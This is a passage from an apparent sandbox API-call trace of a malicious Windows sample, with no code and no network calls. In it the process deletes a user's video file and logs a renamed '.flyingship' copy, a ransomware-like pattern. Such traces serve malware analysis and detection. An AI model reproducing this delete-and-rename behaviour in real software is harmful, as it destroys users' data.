lpMsg=0x87f114) returned 0 [0196.775] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.775] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.775] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.775] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0196.775] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.775] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.775] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0196.775] FreeLibrary (hLibModule=0x75990000) returned 1 [0196.775] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.775] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.775] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.775] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi", lpFilePart=0x0) returned 0x50 [0196.776] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50390e50, ftCreationTime.dwHighDateTime=0x1d5e42f, ftLastAccessTime.dwLowDateTime=0xd54794f0, ftLastAccessTime.dwHighDateTime=0x1d5deb6, ftLastWriteTime.dwLowDateTime=0x1a32e580, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x5016, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="RIN_E.avi", cAlternateFileName="")) returned 0x90af58 [0196.776] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1\\rin_e.avi")) returned 1 [0196.777] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50390e50, ftCreationTime.dwHighDateTime=0x1d5e42f, ftLastAccessTime.dwLowDateTime=0xd54794f0, ftLastAccessTime.dwHighDateTime=0x1d5deb6, ftLastWriteTime.dwLowDateTime=0x1a32e580, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x5016, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="RIN_E.avi", cAlternateFileName="")) returned 0 [0196.777] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0196.778] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.779] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.779] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0196.779] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0196.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0196.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0196.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0196.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0196.789] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0196.789] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0196.789] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0196.789] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0196.790] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0196.790] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.790] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0196.790] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.791] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0196.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0196.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0196.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0196.791] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0196.791] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x37e7, lpOverlapped=0x0) returned 1 [0196.791] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0196.791] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x37e7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.791] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0196.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0196.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0196.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0196.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.flyingship.avi\r\n", cchWideChar=94, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 94 [0196.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5e) returned 0x9a5de0 [0196.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.flyingship.avi\r\n", cchWideChar=94, lpMultiByteStr=0x9a5de0, cbMultiByte=94, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.flyingship.avi\r\n", lpUsedDefaultChar=0x0) returned 94 [0196.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0196.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0196.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0196.792] WriteFile (in: hFile=0x158, lpBuffer=0x9a5d10*, nNumberOfBytesToWrite=0x5d, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d10*, lpNumberOfBytesWritten=0x87f43c*=0x5d, lpOverlapped=0x0) returned 1 [0196.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0196.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.792] CloseHandle (hObject=0x158) returned 1 [0196.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0196.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0196.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0196.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0196.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0196.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0196.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0196.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0196.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0196.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0196.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0196.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0196.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0196.795] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0196.795] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0196.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0196.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0196.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0196.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0196.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6e48 | out: hHeap=0x8a0000) returned 1 [0196.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0196.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0196.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0196.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0196.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0196.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0196.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0196.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0196.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0196.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0196.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0196.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0196.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0196.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0196.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0196.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0196.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0196.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0196.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0196.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0196.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0196.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0196.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0196.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0196.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0196.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0196.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0196.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0196.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0196.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0196.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0196.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0196.796] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0196.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0196.796] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0196.796] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0196.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0196.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0196.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0196.796] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0196.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0196.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0196.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0196.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0196.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0196.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0196.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0196.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0196.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0196.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0196.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0196.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba498 [0196.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0196.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0196.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0196.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0196.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0196.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0196.797] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0196.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0196.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0196.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0196.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0196.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0196.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0196.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0196.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0196.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0196.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0196.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0196.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0196.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0196.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0196.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0196.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0196.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0196.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0196.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0196.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0196.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0196.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0196.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0196.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0196.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0196.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0196.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0196.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0196.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0196.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0196.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0196.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0196.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0196.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0196.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0196.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0196.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0196.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0196.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0196.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0196.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0196.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0196.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0196.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0196.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0196.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0196.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0196.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0196.800] 